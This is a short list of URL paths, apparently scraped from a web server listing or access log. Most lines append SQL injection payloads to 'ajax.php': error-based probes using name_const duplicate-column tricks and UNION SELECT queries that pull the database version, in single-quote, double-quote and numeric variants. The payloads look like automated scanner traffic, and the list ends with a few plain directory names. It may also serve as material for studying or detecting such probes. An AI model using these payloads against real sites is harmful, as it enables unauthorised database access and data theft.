ajax.php
ajax.php or (1,2)=(select*from(select name_const(CHAR(79,90,121,71,66,116,110,78,98,76,82),1),name_const(CHAR(79,90,121,71,66,116,110,78,98,76,82),1))a) -- and 1=1
ajax.php"
ajax.php" or (1,2)=(select*from(select name_const(CHAR(79,90,121,71,66,116,110,78,98,76,82),1),name_const(CHAR(79,90,121,71,66,116,110,78,98,76,82),1))a) -- "x"="x
ajax.php' or (1,2)=(select*from(select name_const(CHAR(79,90,121,71,66,116,110,78,98,76,82),1),name_const(CHAR(79,90,121,71,66,116,110,78,98,76,82),1))a) -- 'x'='x
ajax.php2121121121212.1
ajax.php99999" union select unhex(hex(version())) -- "x"="x
ajax.php99999' union select unhex(hex(version())) -- 'x'='x
ajax.php999999.1 union select unhex(hex(version())) -- and 1=1
file/
ueditor/
vendor/